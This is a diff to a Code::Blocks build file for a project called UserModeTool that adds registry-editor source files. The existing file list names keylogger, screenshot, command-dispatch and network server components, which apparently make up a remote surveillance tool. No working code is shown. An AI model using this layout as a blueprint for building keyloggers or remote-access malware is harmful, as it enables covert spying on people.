--- a/UserModeTool/UserModeTool.cbp
+++ b/UserModeTool/UserModeTool.cbp
@@ -15,6 +15,7 @@
 					<Add option="-g" />
 					<Add option="-D_DEBUG" />
 					<Add directory="include/methods/driver" />
+					<Add directory="include/utils/registry" />
 				</Compiler>
 			</Target>
 			<Target title="Release">
@@ -24,6 +25,7 @@
 				<Option compiler="gcc" />
 				<Compiler>
 					<Add directory="include/methods/driver" />
+					<Add directory="include/utils/registry" />
 				</Compiler>
 			</Target>
 		</Build>
@@ -69,6 +71,8 @@
 		<Unit filename="include/networking/interfaces/ITCPServer.h" />
 		<Unit filename="include/networking/interfaces/IUDPServer.h" />
 		<Unit filename="include/utils/builders.h" />
+		<Unit filename="include/utils/registry/IRegistryEditor.h" />
+		<Unit filename="include/utils/registry/RegistryEditor.h" />
 		<Unit filename="src/command/CommandDispatcher.cpp" />
 		<Unit filename="src/command/execute/KeyloggerExecuter.cpp" />
 		<Unit filename="src/command/execute/ScreenshotExecuter.cpp" />
@@ -88,6 +92,7 @@
 		<Unit filename="src/networking/WinsockUDPClient.cpp" />
 		<Unit filename="src/networking/WinsockUDPServer.cpp" />
 		<Unit filename="src/utils/builders.cpp" />
+		<Unit filename="src/utils/registry/RegistryEditor.cpp" />
 		<Extensions>
 			<code_completion />
 			<envvars />
